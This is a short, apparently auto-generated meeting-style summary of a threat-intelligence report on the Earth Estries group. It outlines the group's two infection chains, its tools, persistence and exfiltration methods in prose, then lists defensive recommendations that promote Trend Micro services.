November 8, 2024 at 04:49AM
Earth Estries utilizes two distinct attack chains, exploiting vulnerabilities especially in Microsoft Exchange servers. The first chain employs CAB-delivered tools like PsExec and Cobalt Strike for lateral movement. The second chain uses web shells and backdoors like Zingdoor for data exfiltration. Continuous updates confirm their persistent threat.
### Meeting Takeaways
**Summary of Earth Estries’ Attack Campaigns:**
1. **Two Distinct Attack Chains:**
– **Chain 1:** Utilizes PsExec along with tools like Trillclient, Hemigate, and Crowdoor, delivered via CAB files.
– **Chain 2:** Employs malware such as Zingdoor and SnappyBee, delivered through cURL downloads.
2. **Common Characteristics:**
– Exploitation of vulnerabilities in Microsoft Exchange servers and management tools.
– Use of backdoors for lateral movement and credential theft.
– Persistent updating of tools for prolonged network presence.
**Key Tools and Techniques:**
1. **First Infection Chain:**
– Initial access through QConvergeConsole vulnerabilities to install Cobalt Strike and maintain control.
– Credential theft using Trillclient to extract browser data.
– Lateral movement via PsExec and WMIC with batch files for installation.
2. **Second Infection Chain:**
– Initial access through exploitation of Microsoft Exchange servers via a web shell (ChinaChopper).
– Additional backdoors installed including Zingdoor and Snappybee.
– C2 communication often utilizes DNS tunneling or internal proxies to obfuscate traffic.
**Persistence Mechanisms:**
– Scheduled tasks and various loader types (DLL sideloading, msiexec.exe) used for maintaining access.
– Continuous updates and reinstallation of backdoors to avoid detection.
**Data Collection and Exfiltration:**
– User credentials harvested through TrillClient.
– Sensitive document collection via wget and RAR commands followed by exfiltration via cURL to anonymized file-sharing services.
– Use of XOR and other encryption methods for protecting exfiltrated data.
**Recommendations for Defense:**
1. **Strengthening External Services:**
Focus on securing email servers and web applications, ensuring all known vulnerabilities are patched.
2. **Implementing Robust Credential Management:**
Improve practices to safeguard against credential theft.
3. **Multilayered Defense Strategy:**
Utilize technologies like Trend Vision One™ for comprehensive monitoring and threat detection.
4. **Proactive Threat Intelligence:**
Leverage Trend Micro’s intelligence services to stay informed about emerging threats and actor behavior.
### Additional Notes:
– Continuous adaptation of tactics and tools by Earth Estries emphasizes the need for constant vigilance in cyber defense mechanisms.
– Providing awareness of specific indicators of compromise and hunting queries for detecting related malware can enhance response strategies.
**Follow Up:**
– Ensure all departments are briefed on the recommended defensive measures and the importance of maintaining updated threat intelligence protocols.